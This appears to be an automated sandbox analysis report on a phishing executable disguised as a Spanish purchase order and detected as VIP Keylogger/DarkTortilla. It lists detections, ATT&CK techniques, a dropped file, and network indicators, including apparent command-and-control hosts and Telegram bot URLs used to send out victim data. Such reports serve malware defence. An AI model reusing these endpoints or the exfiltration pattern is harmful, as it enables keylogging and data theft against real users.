Source: Yara match	File source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2036, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2036, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	13 System Information Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	311 Process Injection	1 Software Packing	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	11 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DarkTortilla
CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	100%	Avira	HEUR/AGEN.1304202
CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\xload.exe	100%	Avira	HEUR/AGEN.1304202
C:\Users\user\AppData\Roaming\xload.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\xload.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DarkTortilla

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
https://www.getpaint.net/	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20a	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://www.office.com/T	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://reallyfreegeoip.orgd	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://smtp.zoho.eud	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
http://purl.oen	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
http://smtp.zoho.eu	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2013/09/2024%20/%2005:40:24%0D%0ACountry%20Name:%20United%20States%0D%0A[%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org0	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/q	0%	Avira URL Cloud	safe
http://checkip.dyndns.orgd	0%	Avira URL Cloud	safe
http://status.thawte.com0:	0%	Avira URL Cloud	safe
http://checkip.dyndns.comd	0%	Avira URL Cloud	safe
http://reallyfreegeoip.org	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enT	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2013/09/2024%20/%2003:22:57%0D%0ACountry%20Name:%20United%20States%0D%0A[%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/d	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
smtp.zoho.eu	185.230.214.164	true	true	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2013/09/2024%20/%2005:40:24%0D%0ACountry%20Name:%20United%20States%0D%0A[%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2013/09/2024%20/%2003:22:57%0D%0ACountry%20Name:%20United%20States%0D%0A[%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.getpaint.net/	cmd.exe, 00000009.00000003.1768209106.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, xload.exe.9.dr	false	Avira URL Cloud: safe	unknown
https://www.office.com/	InstallUtil.exe, 00000014.00000002.2614654788.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/T	InstallUtil.exe, 00000014.00000002.2614654788.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20a	InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	InstallUtil.exe, 00000014.00000002.2627765188.0000000005C40000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.orgd	InstallUtil.exe, 00000016.00000002.2614850427.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	InstallUtil.exe, 00000014.00000002.2614654788.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://smtp.zoho.eud	InstallUtil.exe, 00000014.00000002.2614654788.00000000029D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	InstallUtil.exe, 00000014.00000002.2614654788.0000000002A5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	InstallUtil.exe, 00000014.00000002.2627765188.0000000005C40000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://smtp.zoho.eu	InstallUtil.exe, 00000014.00000002.2614654788.00000000029D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://purl.oen	xload.exe, 00000015.00000002.2521643298.0000000005DFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org0	InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	InstallUtil.exe, 00000014.00000002.2614654788.00000000029D6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.comd	InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.0000000002914000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.000000000295A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://status.thawte.com0:	InstallUtil.exe, 00000014.00000002.2627765188.0000000005C40000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enlB	InstallUtil.exe, 00000014.00000002.2614654788.0000000002A56000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	InstallUtil.exe, 00000016.00000002.2614850427.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.orgd	InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.000000000295A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enT	InstallUtil.exe, 00000014.00000002.2614654788.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
